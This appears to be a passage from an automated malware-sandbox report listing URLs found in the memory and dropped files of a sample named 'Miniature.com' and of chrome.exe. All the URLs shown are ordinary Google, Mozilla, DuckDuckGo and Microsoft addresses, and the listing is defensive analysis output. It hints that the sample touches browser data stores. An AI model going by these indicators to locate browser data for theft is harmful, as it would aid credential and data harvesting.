                Source: Miniature.com, 00000010.00000002.2127699132.0000000004941000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000002.2125663035.0000000001C8B000.00000004.00000020.00020000.00000000.sdmp, A1NG4W.16.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: chrome.exe, 00000015.00000002.1727769657.0000010400EA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
                Source: Reporting and NEL.27.drString found in binary or memory: https://deff.nelreports.net/api/report
                Source: Reporting and NEL.27.dr, 2cc80dabc69f58b6_0.26.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: Reporting and NEL.27.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msnw
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1723256333.00000104002D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000015.00000002.1723927836.00000104004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725083338.00000104007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1727097599.0000010400CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725185336.000001040080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000015.00000002.1723927836.00000104004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725083338.00000104007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1727097599.0000010400CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725185336.000001040080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000015.00000002.1723927836.00000104004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725083338.00000104007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1727097599.0000010400CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725185336.000001040080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1723256333.00000104002D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000015.00000002.1724787435.0000010400760000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1727840637.0000010400EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1723989968.0000010400500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1723256333.00000104002D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000015.00000002.1724787435.0000010400760000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1727840637.0000010400EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1723989968.0000010400500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000015.00000003.1655920834.0000010400450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1723566178.0000010400394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000015.00000002.1726956412.0000010400C7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1722984236.00000104001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                Source: chrome.exe, 00000015.00000002.1722984236.00000104001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=searchTerms
                Source: chrome.exe, 00000015.00000002.1724301271.000001040061C000.00000004.00000800.00020000.00000000.sdmp, XTJEKX.16.dr, Web Data.26.dr, 5FCJE3.16.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Miniature.com, 00000010.00000002.2126606877.000000000463D000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000002.2127699132.00000000046F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726956412.0000010400C7C000.00000004.00000800.00020000.00000000.sdmp, XTJEKX.16.dr, Web Data.26.dr, 5FCJE3.16.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: chrome.exe, 00000015.00000002.1726956412.0000010400C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab6
                Source: chrome.exe, 00000015.00000002.1726956412.0000010400C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
                Source: Miniature.com, 00000010.00000002.2126606877.000000000463D000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000002.2127699132.00000000046F4000.00000004.00000800.00020000.00000000.sdmp, XTJEKX.16.dr, Web Data.26.dr, 5FCJE3.16.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.dr, HubApps Icons.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.dr, HubApps Icons.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.dr, HubApps Icons.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.dr, HubApps Icons.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.dr, HubApps Icons.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.dr, HubApps Icons.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.dr, HubApps Icons.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
                Source: chrome.exe, 00000015.00000002.1742473501.000033EC0079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1641591808.000033EC003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1641829346.000033EC003AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                Source: chrome.exe, 00000015.00000002.1742473501.000033EC0079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1641591808.000033EC003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1641829346.000033EC003AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                Source: chrome.exe, 00000015.00000002.1742473501.000033EC0079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
                Source: chrome.exe, 00000015.00000003.1641591808.000033EC003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1641829346.000033EC003AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: chrome.exe, 00000015.00000003.1655875411.0000010400D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                Source: chrome.exe, 00000015.00000002.1727123070.0000010400CD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/Char
                Source: chrome.exe, 00000015.00000002.1725207665.000001040081C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/Chartk3
                Source: chrome.exe, 00000015.00000002.1724301271.000001040061C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
                Source: chrome.exe, 00000015.00000002.1728972505.00000104011C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_promos
                Source: content_new.js.26.dr, content.js.26.drString found in binary or memory: https://www.google.com/chrome
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
                Source: chrome.exe, 00000015.00000002.1728069945.0000010400F40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725887499.0000010400968000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725442700.0000010400854000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1722984236.00000104001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
                Source: chrome.exe, 00000015.00000002.1728069945.0000010400F40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725887499.0000010400968000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1725442700.0000010400854000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1722984236.00000104001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gs
                Source: chrome.exe, 00000015.00000002.1727705197.0000010400E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1724787435.0000010400760000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1724193686.00000104005C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1723989968.0000010400500000.00000004.00000800.00020000.00000000.sdmp, XTJEKX.16.dr, Web Data.26.dr, 5FCJE3.16.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: chrome.exe, 00000015.00000002.1723769051.0000010400438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1690145951.0000010401C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1690446235.0000010401BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
                Source: chrome.exe, 00000015.00000003.1690446235.0000010401BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                Source: chrome.exe, 00000015.00000003.1655920834.0000010400450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
                Source: chrome.exe, 00000015.00000002.1723927836.00000104004D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
                Source: chrome.exe, 00000015.00000002.1726339262.0000010400A4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/undo
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
                Source: chrome.exe, 00000015.00000002.1722378153.000001040001C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                Source: chrome.exe, 00000015.00000003.1684125318.000001040140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                Source: chrome.exe, 00000015.00000002.1723045820.000001040020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
                Source: chrome.exe, 00000015.00000002.1723045820.000001040020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
                Source: chrome.exe, 00000015.00000002.1723045820.000001040020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
                Source: chrome.exe, 00000015.00000002.1723045820.000001040020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                Source: chrome.exe, 00000015.00000002.1723927836.00000104004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1722546758.000001040009C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
                Source: chrome.exe, 00000015.00000002.1727547447.0000010400E18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                Source: chrome.exe, 00000015.00000003.1690145951.0000010401C60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                Source: chrome.exe, 00000015.00000003.1699220213.0000010401384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1690468702.0000010401D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1693801169.0000010401C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1699459529.0000010401C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1730972523.0000010401C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1704390408.0000010401D18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1690302224.0000010401C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1690145951.0000010401C60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                Source: chrome.exe, 00000015.00000003.1690145951.0000010401C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1690446235.0000010401BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
                Source: chrome.exe, 00000015.00000003.1690145951.0000010401C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1690446235.0000010401BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
                Source: Miniature.com, 00000010.00000002.2127699132.0000000004941000.00000004.00000800.00020000.00000000.sdmp, Miniature.com, 00000010.00000002.2125663035.0000000001C8B000.00000004.00000020.00020000.00000000.sdmp, A1NG4W.16.drString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: Miniature.com, 00000010.00000002.2129602048.0000000006C6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
                Source: Miniature.com, 00000010.00000002.2129602048.0000000006C6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
                Source: Miniature.com, 00000010.00000002.2129602048.0000000006C6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                Source: Miniature.com, 00000010.00000002.2129602048.0000000006C6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Miniature.com, 00000010.00000002.2129602048.0000000006C6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://www.office.com
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
